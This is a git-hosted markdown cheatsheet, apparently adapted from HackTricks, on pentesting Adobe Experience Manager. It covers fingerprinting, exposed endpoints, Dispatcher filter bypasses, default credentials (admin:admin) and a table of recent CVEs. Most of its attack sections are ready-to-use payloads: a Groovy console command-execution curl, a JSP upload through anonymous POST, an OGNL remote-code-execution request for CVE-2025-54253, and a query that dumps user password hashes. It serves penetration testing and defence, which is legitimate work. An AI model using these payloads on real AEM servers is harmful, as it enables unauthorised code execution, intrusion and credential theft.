daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

aem-adobe-experience-cloud.md (8031B)


      1 ---
      2 title: "AEM (Adobe Experience Manager) Pentesting"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # AEM (Adobe Experience Manager) Pentesting
     14 
     15 > Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).  
     16 > From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.
     17 
     18 The checklist below focuses on **externally reachable (unauth) attack surface** that keeps showing up in real engagements (2022-2026).
     19 
     20 ---
     21 
     22 ## 1. Fingerprinting
     23 
     24 ```text
     25 $ curl -s -I https://target | egrep -i "aem|sling|cq"
     26 X-Content-Type-Options: nosniff
     27 X-Dispatcher: hu1            # header added by AEM Dispatcher
     28 X-Vary: Accept-Encoding
     29 ```
     30 
     31 Other quick indicators:
     32 * `/etc.clientlibs/` static path present (returns JS/CSS).  
     33 * `/libs/granite/core/content/login.html` login page with the “Adobe Experience Manager” banner.  
     34 * `</script><!--/* CQ */-->` comment at the bottom of HTML.
     35 
     36 ---
     37 
     38 ## 2. High-value unauthenticated endpoints
     39 
     40 Path | What you get | Notes
     41 ---- | ------------- | -----
     42 `/.json`, `/.1.json` | JCR nodes via **DefaultGetServlet** | Often blocked, but *Dispatcher bypass* (see below) works.
     43 `/bin/querybuilder.json?path=/` | QueryBuilder API | Leak of page tree, internal paths, user names.
     44 `/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 by default; if exposed & creds found ⇒ bundle-upload RCE.
     45 `/crx/packmgr/index.jsp` | Package Manager | Allows authenticated content packages → JSP payload upload.
     46 `/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution.
     47 `/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure.
     48 `/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector.
     49 `/adminui/debug` | **AEM Forms on JEE** Struts dev-mode OGNL evaluator | On misconfigured Forms installs (CVE-2025-54253) this endpoint executes unauthenticated OGNL → RCE.<sup>[[2]](#references)[[3]](#references)</sup>
     50 
     51 ### Dispatcher bypass tricks (still working in 2025/2026)
     52 Most production sites sit behind the *Dispatcher* (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.
     53 
     54 *Classic semicolon + allowed extension*
     55 ```text
     56 GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
     57 ```
     58 
     59 *Encoded slash bypass (2025 KB ka-27832)*
     60 ```text
     61 GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
     62 ```
     63 If the Dispatcher allows encoded slashes, this returns JSON even when `/bin` is supposedly denied.
     64 
     65 ---
     66 
     67 ## 3. Common misconfigurations (still alive in 2026)
     68 
     69 1. **Anonymous POST servlet** – `POST /.json` with `:operation=import` lets you plant new JCR nodes. Blocking `*.json` POST in the Dispatcher fixes it.
     70 2. **World-readable user profiles** – default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
     71 3. **Default credentials** – `admin:admin`, `author:author`, `replication:replication`.
     72 4. **WCMDebugFilter** enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
     73 5. **Groovy Console exposed** – remote code execution by sending a Groovy script:
     74    ```bash
     75    curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
     76    ```
     77 6. **Dispatcher encoded-slash gap** – `/bin/querybuilder.json` and `/etc/truststore.json` reachable with `%2f`/`%3B` even when blocked by path filters.
     78 7. **AEM Forms Struts devMode left enabled** – `/adminui/debug?expression=` evaluates OGNL without auth (CVE-2025-54253) leading to unauth RCE; paired XXE in Forms submission (CVE-2025-54254) allows file read.<sup>[[2]](#references)[[3]](#references)</sup>
     79 
     80 ---
     81 
     82 ## 4. Recent vulnerabilities (service-pack cadence)
     83 
     84 Quarter | CVE / Bulletin | Affected | Impact
     85 ------- | --- | -------- | ------
     86 Dec 2025 | **APSB25-115**, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution via author UI.<sup>[[1]](#references)</sup>
     87 Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) – upgrade to 6.5.24/Cloud 2025.12.
     88 Aug 2025 | **CVE-2025-54253 / 54254** (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated.<sup>[[2]](#references)[[3]](#references)</sup>
     89 Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components.
     90 Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv).
     91 Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via crafted URL.
     92 
     93 Always check the *APSB* bulletin matching the customer’s service-pack and push for the latest **6.5.24 (Nov 26, 2025)** or **Cloud Service 2025.12**. AEM Forms on JEE requires its own add-on hotfix **6.5.0-0108+**.
     94 
     95 ---
     96 
     97 ## 5. Exploitation snippets
     98 
     99 ### 5.1 RCE via dispatcher bypass + JSP upload
    100 If anonymous write is possible:
    101 ```text
    102 # 1. Create a node that will become /content/evil.jsp
    103 POST /content/evil.jsp;%0aa.css HTTP/1.1
    104 Content-Type: application/x-www-form-urlencoded
    105 
    106 :contentType=text/plain
    107 jcr:data=<% out.println("pwned"); %>
    108 :operation=import
    109 ```
    110 Now request `/content/evil.jsp` – the JSP runs with the AEM process user.
    111 
    112 ### 5.2 SSRF to RCE (historical < 6.3)
    113 `/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console`  
    114 `aem_ssrf2rce.py` from **aem-hacker** automates the full chain.
    115 
    116 ### 5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
    117 ```text
    118 # Unauth devMode OGNL to run whoami
    119 curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
    120 ```
    121 If vulnerable, the HTTP body contains the command output.<sup>[[2]](#references)</sup>
    122 
    123 ### 5.4 QueryBuilder hash disclosure (encoded slash bypass)
    124 ```text
    125 GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
    126 ```
    127 Returns user nodes including `rep:password` hashes when anonymous read ACLs are default.
    128 
    129 ---
    130 
    131 ## 6. Tooling
    132 
    133 * **aem-hacker** – Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more.  
    134   ```bash
    135   python3 aem_hacker.py -u https://target --host attacker-ip
    136   ```
    137 * **Tenable WAS plugin 115065** – Detects QueryBuilder hash disclosure & encoded-slash bypass automatically (published Dec 2025).
    138 * **Content brute-force** – recursively request `/_jcr_content.(json|html)` to discover hidden components.
    139 * **osgi-infect** – upload malicious OSGi bundle via `/system/console/bundles` if creds available.
    140 
    141 ## References
    142 
    143 - [1] [Adobe Security Bulletin APSB25-115 – Security updates for Adobe Experience Manager (Dec 9, 2025)](https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html)
    144 - [2] [Struts Devmode in 2025? Critical Pre-Auth Vulnerabilities in Adobe Experience Manager Forms](https://slcyber.io/assetnote-security-research-center/struts-devmode-in-2025-critical-pre-auth-vulnerabilities-in-adobe-experience-manager-forms)
    145 - [3] [BleepingComputer – Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)](https://www.bleepingcomputer.com/news/security/adobe-issues-emergency-fixes-for-aem-forms-zero-days-after-pocs-released/)